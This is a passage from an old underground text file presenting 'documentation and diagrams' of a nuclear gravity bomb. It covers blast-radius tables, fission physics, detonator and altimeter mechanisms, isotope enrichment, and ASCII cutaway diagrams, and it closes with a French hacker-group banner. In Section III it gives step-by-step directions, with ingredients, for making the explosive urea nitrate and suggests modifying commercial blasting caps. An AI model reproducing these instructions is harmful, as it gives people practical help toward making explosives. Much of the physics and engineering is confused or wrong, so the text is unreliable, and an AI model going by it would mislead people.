          Overpress=17 psi.  Wind velocity=290 mph.

     [3]  Severe Blast Damage
          -------------------
          Factories and other large-scale building collapse.  Severe damage
          to highway bridges.  Rivers sometimes flow countercurrent.
          65% fatalities, 30% injured.
          Overpress=9 psi.  Wind velocity=260 mph.

     [4]  Severe Heat Damage
          ------------------
          Everything flammable burns.  People in the area suffocate due to
          the fact that most available oxygen is consumed by the fires.
          50% fatalities, 45% injured.
          Overpress=6 psi.  Wind velocity=140 mph.

     [5]  Severe Fire & Wind Damage
          -------------------------
          Residency structures are severely damaged.  People are blown
          around.  2nd and 3rd-degree burns suffered by most survivors.
          15% dead.  50% injured.
          Overpress=3 psi.  Wind velocity=98 mph.



----------------------------------------------------------------------------

                            - Blast Zone Radii -
                           ----------------------
                          [3 different bomb types]
____________________________________________________________________________
  ______________________   ______________________   ______________________
 |                      | |                      | |                      |
 |    -[10 KILOTONS]-   | |     -[1 MEGATON]-    | |    -[20 MEGATONS]-   |
 |----------------------| |----------------------| |----------------------|
 | Airburst - 1,980 ft  | | Airburst - 8,000 ft  | | Airburst - 17,500 ft |
 |______________________| |______________________| |______________________|
 |                      | |                      | |                      |
 |  [1]  0.5 miles      | |  [1]  2.5 miles      | |  [1]  8.75 miles     |
 |  [2]  1 mile         | |  [2]  3.75 miles     | |  [2]  14 miles       |
 |  [3]  1.75 miles     | |  [3]  6.5 miles      | |  [3]  27 miles       |
 |  [4]  2.5 miles      | |  [4]  7.75 miles     | |  [4]  31 miles       |
 |  [5]  3 miles        | |  [5]  10 miles       | |  [5]  35 miles       |
 |                      | |                      | |                      |
 |______________________| |______________________| |______________________|
____________________________________________________________________________

============================================================================


-End of section 1-

 
--------------------------------
  File courtesy of Outlaw Labs
--------------------------------

     II.  Nuclear Fission/Nuclear Fusion
          ------------------------------


     There are 2 types of atomic explosions that can be facilitated by U-235;
fission and fusion.  Fission, simply put, is a nuclear reaction in which an
atomic nucleus splits into fragments, usually two fragments of comparable
mass, with the evolution of approximately 100 million to several hundred
million volts of energy.  This energy is expelled explosively and violently in
the atomic bomb.  A fusion reaction is invariably started with a fission
reaction, but unlike the fission reaction, the fusion (Hydrogen) bomb derives
its power from the fusing of nuclei of various hydrogen isotopes in the
formation of helium nuclei.  Being that the bomb in this file is strictly
atomic, the other aspects of the Hydrogen Bomb will be set aside for now.

     The massive power behind the reaction in an atomic bomb arises from the
forces that hold the atom together.  These forces are akin to, but not quite
the same as, magnetism.

     Atoms are comprised of three sub-atomic particles.  Protons and neutrons
cluster together to form the nucleus (central mass) of the atom while the
electrons orbit the nucleus much like planets around a sun.  It is these
particles that determine the stability of the atom.

     Most natural elements have very stable atoms which are impossible to
split except by bombardment by particle accelerators.  For all practical
purposes, the one true element whose atoms can be split comparatively easily
is the metal Uranium.  Uranium's atoms are unusually large, henceforth, it is
hard for them to hold together firmly.  This makes Uranium-235 an exceptional
candidate for nuclear fission.

     Uranium is a heavy metal, heavier than gold, and not only does it have
the largest atoms of any natural element, the atoms that comprise Uranium have
far more neutrons than protons.  This does not enhance their capacity to
split, but it does have an important bearing on their capacity to facilitate
an explosion.

     There are two isotopes of Uranium.  Natural Uranium consists mostly of
isotope U-238, which has 92 protons and 146 neutrons (92+146=238).  Mixed with
this isotope, one will find a 0.6% accumulation of U-235, which has only 143
neutrons.  This isotope, unlike U-238, has atoms that can be split, thus it is
termed "fissionable" and useful in making atomic bombs.  Being that U-238 is
neutron-heavy, it reflects neutrons, rather than absorbing them like its
brother isotope, U-235.  (U-238 serves no function in an atomic reaction, but
its properties provide an excellent shield for the U-235 in a constructed bomb
as a neutron reflector.  This helps prevent an accidental chain reaction
between the larger U-235 mass and its `bullet' counterpart within the bomb.
Also note that while U-238 cannot facilitate a chain-reaction, it can be
neutron-saturated to produce Plutonium (Pu-239).  Plutonium is fissionable and
can be used in place of Uranium-235 {albeit, with a different model of
detonator} in an atomic bomb. [See Sections 3 & 4 of this file.])

     Both isotopes of Uranium are naturally radioactive.  Their bulky atoms
disintegrate over a period of time.  Given enough time, (over 100,000 years or
more) Uranium will eventually lose so many particles that it will turn into
the metal lead.  However, this process can be accelerated.  This process is
known as the chain reaction.  Instead of disintegrating slowly, the atoms are
forcibly split by neutrons forcing their way into the nucleus.  A U-235 atom
is so unstable that a blow from a single neutron is enough to split it and
henceforth bring on a chain reaction.  This can happen even when a critical
mass is present.  When this chain reaction occurs, the Uranium atom splits
into two smaller atoms of different elements, such as Barium and Krypton.

     When a U-235 atom splits, it gives off energy in the form of heat and
Gamma radiation, which is the most powerful form of radioactivity and the most
lethal.  When this reaction occurs, the split atom will also give off two or
three of its `spare' neutrons, which are not needed to make either Barium or
Krypton.  These spare neutrons fly out with sufficient force to split other
atoms they come in contact with.  [See chart below]  In theory, it is
necessary to split only one U-235 atom, and the neutrons from this will split
other atoms, which will split more...so on and so forth.  This progression
does not take place arithmetically, but geometrically.  All of this will
happen within a millionth of a second.

     The minimum amount to start a chain reaction as described above is known
as SuperCritical Mass.  The actual mass needed to facilitate this chain
reaction depends upon the purity of the material, but for pure U-235, it is
110 pounds (50 kilograms), but no Uranium is never quite pure, so in reality
more will be needed.

     Uranium is not the only material used for making atomic bombs.  Another
material is the element Plutonium, in its isotope Pu-239.  Plutonium is not
found naturally (except in minute traces) and is always made from Uranium.
The only way to produce Plutonium from Uranium is to process U-238 through a
nuclear reactor.  After a period of time, the intense radioactivity causes the
metal to pick up extra particles, so that more and more of its atoms turn into
Plutonium.

     Plutonium will not start a fast chain reaction by itself, but this
difficulty is overcome by having a neutron source, a highly radioactive
material that gives off neutrons faster than the Plutonium itself.  In certain
types of bombs, a mixture of the elements Beryllium and Polonium is used to
bring about this reaction.  Only a small piece is needed.  The material is not
fissionable in and of itself, but merely acts as a catalyst to the greater
reaction.



 ============================================================================


                        - Diagram of a Chain Reaction -
                        -------------------------------



                                       |
                                       |
                                       |
                                       |
    [1]------------------------------> o

                                    . o o .
                                   . o_0_o . <-----------------------[2]
                                   . o 0 o .
                                    . o o .

                                       |
                                      \|/
                                       ~

                                 . o o. .o o .
    [3]-----------------------> . o_0_o"o_0_o .
                                . o 0 o~o 0 o .
                                 . o o.".o o .
                                       |
                                  /    |    \
                                |/_    |    _\|
                                ~~     |     ~~
                                       |
                           o o         |        o o
    [4]-----------------> o_0_o        |       o_0_o <---------------[5]
                          o~0~o        |       o~0~o
                           o o )       |      ( o o
                              /        o       \
                             /        [1]       \
                            /                    \
                           /                      \
                          /                        \
                         o [1]                  [1] o
                 . o o .            . o o .            . o o .
                . o_0_o .          . o_0_o .          . o_0_o .
                . o 0 o .  <-[2]-> . o 0 o . <-[2]->  . o 0 o .
                 . o o .            . o o .            . o o .

                  /                    |                    \
                |/_                   \|/                   _\|
                ~~                     ~                     ~~

      . o o. .o o .              . o o. .o o .              . o o. .o o .
     . o_0_o"o_0_o .            . o_0_o"o_0_o .            . o_0_o"o_0_o .
     . o 0 o~o 0 o . <--[3]-->  . o 0 o~o 0 o .  <--[3]--> . o 0 o~o 0 o .
      . o o.".o o .              . o o.".o o .              . o o.".o o .
        .   |   .                  .   |   .                  .   |   .
       /    |    \                /    |    \                /    |    \
       :    |    :                :    |    :                :    |    :
       :    |    :                :    |    :                :    |    :
      \:/   |   \:/              \:/   |   \:/              \:/   |   \:/
       ~    |    ~                ~    |    ~                ~    |    ~
  [4] o o   |   o o [5]      [4] o o   |   o o [5]      [4] o o   |   o o [5]
     o_0_o  |  o_0_o            o_0_o  |  o_0_o            o_0_o  |  o_0_o
     o~0~o  |  o~0~o            o~0~o  |  o~0~o            o~0~o  |  o~0~o
      o o ) | ( o o              o o ) | ( o o              o o ) | ( o o
         /  |  \                    /  |  \                    /  |  \
        /   |   \                  /   |   \                  /   |   \
       /    |    \                /    |    \                /    |    \
      /     |     \              /     |     \              /     |     \
     /      o      \            /      o      \            /      o      \
    /      [1]      \          /      [1]      \          /      [1]      \
   o                 o        o                 o        o                 o
  [1]               [1]      [1]               [1]      [1]               [1]






 ============================================================================


                              - Diagram Outline -
                             ---------------------


                        [1] - Incoming Neutron
                        [2] - Uranium-235
                        [3] - Uranium-236
                        [4] - Barium Atom
                        [5] - Krypton Atom




===========================================================================



-End of section 2-
-Diagrams & Documentation of the Atomic Bomb- 
--------------------------------
  File courtesy of Outlaw Labs
--------------------------------



     III.  The Mechanism of The Bomb
           -------------------------


     Altimeter
     ---------

     An ordinary aircraft altimeter uses a type of Aneroid Barometer which
measures the changes in air pressure at different heights.  However, changes
in air pressure due to the weather can adversely affect the altimeter's
readings.  It is far more favorable to use a radar (or radio) altimeter for
enhanced accuracy when the bomb reaches Ground Zero.

     While Frequency Modulated-Continuous Wave (FM CW) is more complicated,
the accuracy of it far surpasses any other type of altimeter.  Like simple
pulse systems, signals are emitted from a radar aerial (the bomb), bounced off
the ground and received back at the bomb's altimeter.  This pulse system
applies to the more advanced altimeter system, only the signal is continuous
and centered around a high frequency such as 4200 MHz.  This signal is
arranged to steadily increase at 200 MHz per interval before dropping back to
its original frequency.

     As the descent of the bomb begins, the altimeter transmitter will send
out a pulse starting at 4200 MHz.  By the time that pulse has returned, the
altimeter transmitter will be emitting a higher frequency.  The difference
depends on how long the pulse has taken to do the return journey.  When these
two frequencies are mixed electronically, a new frequency (the difference
between the two) emerges.  The value of this new frequency is measured by the
built-in microchips.  This value is directly proportional to the distance
travelled by the original pulse, so it can be used to give the actual height.

     In practice, a typical FM CW radar today would sweep 120 times per
second.  Its range would be up to 10,000 feet (3000 m) over land and 20,000
feet (6000 m) over sea, since sound reflections from water surfaces are
clearer.

     The accuracy of these altimeters is within 5 feet (1.5 m) for the higher
ranges.  Being that the ideal airburst for the atomic bomb is usually set for
1,980 feet, this error factor is not of enormous concern.

     The high cost of these radar-type altimeters has prevented their use in
commercial applications, but the decreasing cost of electronic components
should make them competitive with barometric types before too long.



     Air Pressure Detonator
     ----------------------

     The air pressure detonator can be a very complex mechanism, but for all
practical purposes, a simpler model can be used.  At high altitudes, the air
is of lesser pressure.  As the altitude drops, the air pressure increases.  A
simple piece of very thin magnetized metal can be used as an air pressure
detonator.  All that is needed is for the strip of metal to have a bubble of
extremely thin metal forged in the center and have it placed directly
underneath the electrical contact which will trigger the conventional
explosive detonation.  Before setting the strip in place, push the bubble in
so that it will be inverted.

     Once the air pressure has achieved the desired level, the magnetic bubble
will snap back into its original position and strike the contact, thus
completing the circuit and setting off the explosive(s).



     Detonating Head
     ---------------

     The detonating head (or heads, depending on whether a Uranium or
Plutonium bomb is being used as a model) that is seated in the conventional
explosive charge(s) is similar to the standard-issue blasting cap.  It merely
serves as a catalyst to bring about a greater explosion.  Calibration of this
device is essential.  Too small of a detonating head will only cause a
colossal dud that will be doubly dangerous since someone's got to disarm and
re-fit the bomb with another detonating head. (an added measure of discomfort
comes from the knowledge that the conventional explosive may have detonated
with insufficient force to weld the radioactive metals.  This will cause a
supercritical mass that could go off at any time.)  The detonating head will
receive an electric charge from the either the air pressure detonator or the
radar altimeter's coordinating detonator, depending on what type of system is
used.  The Du Pont company makes rather excellent blasting caps that can be
easily modified to suit the required specifications.



     Conventional Explosive Charge(s)
     --------------------------------

     This explosive is used to introduce (and weld) the lesser amount of
Uranium to the greater amount within the bomb's housing.  [The amount of
pressure needed to bring this about is unknown and possibly classified by the
United States Government for reasons of National Security]

     Plastic explosives work best in this situation since they can be
manipulated to enable both a Uranium bomb and a Plutonium bomb to detonate.
One very good explosive is Urea Nitrate.  The directions on how to make Urea
Nitrate are as follows:

     - Ingredients -
     ---------------
     [1]  1 cup concentrated solution of uric acid (C5 H4 N4 O3)
     [2]  1/3 cup of nitric acid
     [3]  4 heat-resistant glass containers
     [4]  4 filters (coffee filters will do)


     Filter the concentrated solution of uric acid through a filter to remove
impurities.  Slowly add 1/3 cup of nitric acid to the solution and let the
mixture stand for 1 hour.  Filter again as before.  This time the Urea Nitrate
crystals will collect on the filter.  Wash the crystals by pouring water over
them while they are in the filter.  Remove the crystals from the filter and
allow 16 hours for them to dry.  This explosive will need a blasting cap to
detonate.


     It may be necessary to make a quantity larger than the aforementioned
list calls for to bring about an explosion great enough to cause the Uranium
(or Plutonium) sections to weld together on impact.



     Neutron Deflector
     -----------------

     The neutron deflector is comprised solely of Uranium-238.  Not only is
U-238 non-fissionable, it also has the unique ability to reflect neutrons back
to their source.

     The U-238 neutron deflector can serve 2 purposes.  In a Uranium bomb, the
neutron deflector serves as a safeguard to keep an accidental supercritical
mass from occurring by bouncing the stray neutrons from the `bullet'
counterpart of the Uranium mass away from the greater mass below it (and vice-
versa).  The neutron deflector in a Plutonium bomb actually helps the wedges
of Plutonium retain their neutrons by `reflecting' the stray particles back
into the center of the assembly.  [See diagram in Section 4 of this file.]


     Uranium & Plutonium
     -------------------

     Uranium-235 is very difficult to extract.  In fact, for every 25,000 tons
of Uranium ore that is mined from the earth, only 50 tons of Uranium metal can
be refined from that, and 99.3% of that metal is U-238 which is too stable to
be used as an active agent in an atomic detonation.  To make matters even more
complicated, no ordinary chemical extraction can separate the two isotopes
since both U-235 and U-238 possess precisely identical chemical
characteristics.  The only methods that can effectively separate U-235 from
U-238 are mechanical methods.

     U-235 is slightly, but only slightly, lighter than its counterpart,
U-238.  A system of gaseous diffusion is used to begin the separating process
between the two isotopes.  In this system, Uranium is combined with fluorine
to form Uranium Hexafluoride gas.  This mixture is then propelled by low-
pressure pumps through a series of extremely fine porous barriers.  Because
the U-235 atoms are lighter and thus propelled faster than the U-238 atoms,
they could penetrate the barriers more rapidly.  As a result, the
U-235's concentration became successively greater as it passed through each
barrier.  After passing through several thousand barriers, the Uranium
Hexafluoride contains a relatively high concentration of U-235 -- 2% pure
Uranium in the case of reactor fuel, and if pushed further could
(theoretically) yield up to 95% pure Uranium for use in an atomic bomb.

     Once the process of gaseous diffusion is finished, the Uranium must be
refined once again.  Magnetic separation of the extract from the previous
enriching process is then implemented to further refine the Uranium.  This
involves electrically charging Uranium Tetrachloride gas and directing it past
a weak electromagnet.  Since the lighter U-235 particles in the gas stream are
less affected by the magnetic pull, they can be gradually separated from the
flow.

     Following the first two procedures, a third enrichment process is then
applied to the extract from the second process.  In this procedure, a gas
centrifuge is brought into action to further separate the lighter U-235 from
its heavier counter-isotope.  Centrifugal force separates the two isotopes of
Uranium by their mass.  Once all of these procedures have been completed, all
that need be done is to place the properly molded components of Uranium-235
inside a warhead that will facilitate an atomic detonation.

     Supercritical mass for Uranium-235 is defined as 110 lbs (50 kgs) of
pure Uranium.

     Depending on the refining process(es) used when purifying the U-235 for
use, along with the design of the warhead mechanism and the altitude at which
it detonates, the explosive force of the A-bomb can range anywhere from 1
kiloton (which equals 1,000 tons of TNT) to 20 megatons (which equals 20
million tons of TNT -- which, by the way, is the smallest strategic nuclear
warhead we possess today.  {Point in fact -- One Trident Nuclear Submarine
carries as much destructive power as 25 World War II's}).

     While Uranium is an ideally fissionable material, it is not the only one.
Plutonium can be used in an atomic bomb as well.  By leaving U-238 inside an
atomic reactor for an extended period of time, the U-238 picks up extra
particles (neutrons especially) and gradually is transformed into the element
Plutonium.

     Plutonium is fissionable, but not as easily fissionable as Uranium.
While Uranium can be detonated by a simple 2-part gun-type device, Plutonium
must be detonated by a more complex 32-part implosion chamber along with a
stronger conventional explosive, a greater striking velocity and a
simultaneous triggering mechanism for the conventional explosive packs.  Along
with all of these requirements comes the additional task of introducing a fine
mixture of Beryllium and Polonium to this metal while all of these actions are
occurring.

     Supercritical mass for Plutonium is defined as 35.2 lbs (16 kgs).  This
amount needed for a supercritical mass can be reduced to a smaller quantity of
22 lbs (10 kgs) by surrounding the Plutonium with a U-238 casing.


     To illustrate the vast difference between a Uranium gun-type detonator
and a Plutonium implosion detonator, here is a quick rundown.

 ============================================================================


     [1]  Uranium Detonator
          -----------------

              Comprised of 2 parts.  Larger mass is spherical and concave.
              Smaller mass is precisely the size and shape of the `missing'
              section of the larger mass.  Upon detonation of conventional
              explosive, the smaller mass is violently injected and welded
              to the larger mass.  Supercritical mass is reached, chain
              reaction follows in one millionth of a second.


     [2]  Plutonium Detonator
          -------------------

              Comprised of 32 individual 45-degree pie-shaped sections of
              Plutonium surrounding a Beryllium/Polonium mixture.  These 32
              sections together form a sphere.  All of these sections must
              have the precisely equal mass (and shape) of the others.  The
              shape of the detonator resembles a soccerball.  Upon detonation
              of conventional explosives, all 32 sections must merge with the
              B/P mixture within 1 ten-millionths of a second.



 ____________________________________________________________________________

                                  - Diagram -
                                 -------------
 ____________________________________________________________________________
                                       |
            [Uranium Detonator]        |         [Plutonium Detonator]
 ______________________________________|_____________________________________
                _____                  |
               |    :|                 |               . [2] .
               |    :|                 |           . ~   \_/   ~ .
               | [2]:|                 |        ..        .        ..
               |    :|                 |      [2]|        .        |[2]
               |   .:|                 |     . ~~~ .      .      . ~~~ .
               `...::'                 |    .        .    .    .        .
               _ ~~~ _                 |   .           .  ~  .           .
            . `|     |':..             | [2]\.  .  .  .  [1]  .  .  .  ./[2]
         .     |     | `:::.           |   ./          . ~~~ .          \.
               |     |   `:::          |   .         .    :    .         .
       .       |     |    ::::         |    .      .      .      .      .
               | [1] |    ::|::        |     . ___        .        ___ .
      .        `.   .'   ,::||:        |      [2]|        .        |[2]
                 ~~~     ::|||:        |        .'        _        `.
       ..        [2]   .::|||:'        |           .     / \     .
        ::...       ..::||||:'         |              ~ -[2]- ~
         :::::::::::::||||::'          |
          ``::::||||||||:''            |
              ``:::::''                |
                                       |
                                       |
                                       |
                                       |
       [1] = Collision Point           |      [1] = Collision Point
       [2] - Uranium Section(s)        |      [2] = Plutonium Section(s)
                                       |
                                       |
 ______________________________________|_____________________________________
 ============================================================================



     Lead Shield
     -----------

     The lead shield's only purpose is to prevent the inherent radioactivity
of the bomb's payload from interfering with the other mechanisms of the bomb.
The neutron flux of the bomb's payload is strong enough to short circuit the
internal circuitry and cause an accidental or premature detonation.



     Fuses
     -----

     The fuses are implemented as another safeguard to prevent an accidental
detonation of both the conventional explosives and the nuclear payload.  These
fuses are set near the surface of the `nose' of the bomb so that they can be
installed easily when the bomb is ready to be launched.  The fuses should be
installed only shortly before the bomb is launched.  To affix them before it
is time could result in an accident of catastrophic proportions.

 ============================================================================

-End of section 3-
-Documentation & Diagrams of the Atomic Bomb-
 
--------------------------------
  File courtesy of Outlaw Labs
--------------------------------



  IV.  The Diagram of the Atomic Bomb
       ------------------------------

                             [Gravity Bomb Model]
                         ----------------------------
                        -> Cutaway Sections Visible <-
 ============================================================================

                                      /\
                                     /  \ <---------------------------[1]
                                    /    \
                  _________________/______\_________________
                 | :      ||:      ~      ~               : |
     [2]-------> | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :______||:_____________________________: |
                 |/_______||/______________________________\|
                  \       ~\       |              |         /
                   \       |\      |              |        /
                    \      | \     |              |       /
                     \     |  \    |              |      /
                      \    |___\   |______________|     /
                       \  |     \ |~               \   /
                        \|_______\|_________________\_/
                        |_____________________________|
                        /                             \
                       /       _________________       \
                      /      _/                 \_      \
                     /    __/                     \__    \
                    /    /                           \    \
                   /__ _/                             \_ __\
     [3]_______________________________                 \ _|
                   / /                 \                 \ \
                  / /                  \/                 \ \
                 / /              ___________              \ \
                | /            __/___________\__            \ |
                | |_  ___     /=================\     ___  _| |
     [4]---------> _||___|====|[[[[[[[|||]]]]]]]|====|___||_ <--------[4]
                | |           |-----------------|           | |
                | |           |o=o=o=o=o=o=o=o=o| <-------------------[5]
                | |            \_______________/            | |
                | |__                |: :|                __| |
                | |  \______________ |: :| ______________/  | |
                | | ________________\|: :|/________________ | |
                | |/            |::::|: :|::::|            \| |
     [6]----------------------> |::::|: :|::::| <---------------------[6]
                | |             |::::|: :|::::|             | |
                | |             |::==|: :|== <------------------------[9]
                | |             |::__\: :/__::|             | |
                | |             |::  ~: :~  ::|             | |
     [7]----------------------------> \_/   ::|             | |
                | |~\________/~\|::    ~    ::|/~\________/~| |
                | |            ||::         <-------------------------[8]
                | |_/~~~~~~~~\_/|::_ _ _ _ _::|\_/~~~~~~~~\_| |
     [9]-------------------------->_=_=_=_=_::|             | |
                | |             :::._______.:::             | |
                | |            .:::|       |:::..           | |
                | |        ..:::::'|       |`:::::..        | |
     [6]---------------->.::::::' ||       || `::::::.<---------------[6]
                | |    .::::::' | ||       || | `::::::.    | |
               /| |  .::::::'   | ||       || |   `::::::.  | |
              | | | .:::::'     | ||    <-----------------------------[10]
              | | |.:::::'      | ||       || |      `:::::.| |
              | | ||::::'       | |`.     .'| |       `::::|| |
    [11]___________________________  ``~''  __________________________[11]
              : | | \::            \       /            ::/ | |
             |  | |  \:_________|_|\/__ __\/|_|_________:/  | |
             /  | |   |  __________~___:___~__________  |   | |
            ||  | |   | |          |:::::::|          | |   | |
    [12]   /|:  | |   | |          |:::::::|          | |   | |
  |~~~~~  / |:  | |   | |          |:::::::|          | |   | |
  |----> / /|:  | |   | |          |:::::::|        <-----------------[10]
  |     / / |:  | |   | |          |:::::::|          | |   | |
  |      /  |:  | |   | |          |::::<-----------------------------[13]
  |     /  /|:  | |   | |          |:::::::|          | |   | |
  |    /  / |:  | |   | |          `:::::::'          | |   | |
  |  _/  / /:~: | |   | `:           ``~''           :' |   | |
  |  |  / / ~.. | |   |: `:                         :' :|   | |
  |->| / /   :  | |   :::  `.                     .' <----------------[11]
  |  |/ / ^   ~\|  \  ::::.  `.                 .'  .::::  /  |
  |  ~   /|\    |   \_::::::.  `.             .'  .::::::_/   |
  |_______|     |      \::::::.  `.         .'  .:::<-----------------[6]
                |_________\:::::.. `~.....~' ..:::::/_________|
                |          \::::::::.......::::::::/          |
                |           ~~~~~~~~~~~~~~~~~~~~~~~           |
                `.                                           .'
                 `.                                         .'
                  `.                                       .'
                   `:.                                   .:'
                    `::.                               .::'
                      `::..                         ..::'
                        `:::..                   ..:::'
                          `::::::...        ..::::::'
    [14]------------------> `:____:::::::::::____:' <-----------------[14]
                              ```::::_____::::'''
                                     ~~~~~

 ============================================================================
                              - Diagram Outline -
                             ---------------------

                        [1] - Tail Cone
                        [2] - Stabilizing Tail Fins
                        [3] - Air Pressure Detonator
                        [4] - Air Inlet Tube(s)
                        [5] - Altimeter/Pressure Sensors
                        [6] - Lead Shield Container
                        [7] - Detonating Head
                        [8] - Conventional Explosive Charge
                        [9] - Packing
                       [10] - Uranium (U-235) [Plutonium (See other diagram)]
                       [11] - Neutron Deflector (U-238)
                       [12] - Telemetry Monitoring Probes
                       [13] - Receptacle for U-235 upon detonation
                              to facilitate supercritical mass.
                       [14] - Fuses (inserted to arm bomb)
 ============================================================================
                        - Diagram for Plutonium Bomb -
                       --------------------------------
                       [Gravity Bomb - Implosion Model]
                       --------------------------------
                        -> Cutaway Sections Visible <-
 ============================================================================

                                      /\
                                     /  \ <---------------------------[1]
                                    /    \
                  _________________/______\_________________
                 | :      ||:      ~      ~               : |
     [2]-------> | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :      ||:                             : |
                 | :______||:_____________________________: |
                 |/_______||/______________________________\|
                  \       ~\       | :          |:|         /
                   \       |\      | :          |:|        /
                    \      | \     | :__________|:|       /
                     \     |:_\    | :__________\:|      /
                      \    |___\   |______________|     /
                       \  |     \ |~               \   /
                        \|_______\|_________________\_/
                        |_____________________________|
                        /                             \
                       /                               \
                      /                                 \
                     /          _______________          \
                    /       ___/               \___       \
                   /____ __/                       \__ ____\
     [3]_______________________________               \ ___|
                   / __/               \               \__ \
                  / /                  \/                 \ \
                 / /              ___________              \ \
                / /            __/___________\__            \ \
              ./ /__  ___     /=================\     ___  __\ \.
     [4]-------> ___||___|====|[[[[[|||||||]]]]]|====|___||___ <------[4]
            /  /              |=o=o=o=o=o=o=o=o=| <-------------------[5]
           .' /                \_______ _______/                \ `.
           :  |___                    |*|                    ___|  :
          .'  |   \_________________  |*|  _________________/   |  `.
          :   |   ___________   ___ \ |*| / ___   ___________   |   :
          :   |__/           \ /   \_\\*//_/   \ /           \__|   :
          :   |______________:|:____:: **::****:|:********\ <---------[6]
         .'  /:|||||||||||||'`|;..:::::::::::..;|'`|||||||*|||||:\  `.
     [7]----------> ||||||' .:::;~|~~~___~~~|~;:::. `|||||*|| <-------[7]
         :   |:|||||||||' .::'\ ..:::::::::::.. /`::. `|||*|||||:|   :
         :   |:|||||||' .::' .:::''~~     ~~``:::. `::. `|\***\|:|   :
         :   |:|||||' .::\ .::''\ |   [9]   | /``::: /::. `|||*|:|   :
     [8]------------>::' .::'    \|_________|/    `::: `::. `|* <-----[6]
         `.  \:||' .::' ::'\ [9] .     .     . [9] /::: `::.  *|:/  .'
          :   \:' :::'.::'  \  .               .  /  `::.`::: *:/   :
          :    | .::'.::'____\    [10] . [10]    /____`::.`::.*|    :
          :    | :::~:::     |       . . .       |     :::~:::*|    :
          :    | ::: ::  [9] | .   . ..:.. .   . | [9]  :: :::*|    :
          :    \ ::: ::      |       . :\_____________________________[11]
          `.    \`:: ::: ____|     .   .   .     |____ ::: ::'/    .'
           :     \:;~`::.    / .  [10]   [10]  . \    .::'~::/     :
           `.     \:. `::.  /    .     .     .    \  .::' .:/     .'
            :      \:. `:::/ [9]   _________   [9] \:::' .:/      :
            `.      \::. `:::.   /|         |\   .:::' .::/      .'
             :       ~~\:/ `:::./ |   [9]   | \.:::' \:/~~       :
             `:=========\::. `::::...     ...::::' .::/=========:'
              `:         ~\::./ ```:::::::::''' \.::/~         :'
               `.          ~~~~~~\|   ~~~   |/~~~~~~          .'
                `.                \:::...:::/                .'
                 `.                ~~~~~~~~~                .'
                  `.                                       .'
                   `:.                                   .:'
                    `::.                               .::'
                      `::..                         ..::'
                        `:::..                   ..:::'
                          `::::::...        ..::::::'
    [12]------------------> `:____:::::::::::____:' <-----------------[12]
                              ```::::_____::::'''
                                     ~~~~~



 ============================================================================
                              - Diagram Outline -
                             ---------------------
                        [1] - Tail Cone
                        [2] - Stabilizing Tail Fins
                        [3] - Air Pressure Detonator
                        [4] - Air Inlet Tube(s)
                        [5] - Altimeter/Pressure Sensors
                        [6] - Electronic Conduits & Fusing Circuits
                        [7] - Lead Shield Container
                        [8] - Neutron Deflector (U-238)
                        [9] - Conventional Explosive Charge(s)
                       [10] - Plutonium (Pu-239)
                       [11] - Receptacle for Beryllium/Polonium mixture
                              to facilitate atomic detonation reaction.
                       [12] - Fuses (inserted to arm bomb)
 ============================================================================

`,,`,,`,,``,,`,,`,


_________________________________________________________________________________
桢 桢  

                         -<\________________________/>-
   ~~    ~~    ~~    ~~    H A C K 0 F F ?    غ~~    ~~    ~~    ~~    
~~    ~~    ~~    ~~    ~-</\>-~    ~~    ~~    ~~    ~~
   ~~    ~~    ~~    ~~      http://come.to/legang   ~   ~~    ~~    ~~    ~~    
~~    ~~    ~~    ~~    ~~                            ~~    ~~   ~~    ~~    ~~ 
   ~~    ~~    ~~    ~~      http://come.to/yopyop  ~~   ~~    ~~    ~~    ~~    
~~    ~~    ~~    ~~    ~                              ~    ~~    ~~    ~~    ~~
   ~~    ~~    ~~    ~    http://lasavate.tripod.com      ~~    ~~    ~~    ~~   
~~    ~~    ~~    ~~    ~                              ~    ~~    ~~    ~~    ~~
...Des commentaires, des questions, des insultes, ecrivez aux membres du gang...
_________________________________________________________________________________
桢 桢  

        		    ,`,,`,,`,
			    _____________________________________
			    (((((((      H@CK-OFF !!     ))))))))
			     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
			    ~  ~   `   `   `  ~  ~ 
			     ~  ~  | SE | - | RI | - | AL | ~  ~ 
			    ~  ~   | SA | - | VA | - | TE |  ~  ~ 
			     ~  ~  | SY | - | ST | - | EM | ~  ~ 
			    ~  ~   ,,   ,,   ,,  ~  ~ 
			     Cakeii - Tobozo - Yopyop - Silk - Nk
			       Blured -  Misto!  - Clad_Strife
			     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
			                             {    \|/    
			     >http://come.to/legang  8  -- * --
			     >silk@silk.cut          {    /|\  
			     cakeii@usa.net 
			     nk01@n0past.com 
			     misto@bigfoot.com
			     tobozo@bigfoot.com
			     sniffdoz@yahoo.com
			     yopyop@webmails.com
			     blured75@hotmail.com
			     aolshame@softhome.net
			     clad_strife@hotmail.com
		        `,,`,,`,    
		       /   O o          O o          O o    \   
		       \    O            O            O     /   
		        ,,`,,`,,     
		    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[EOF]
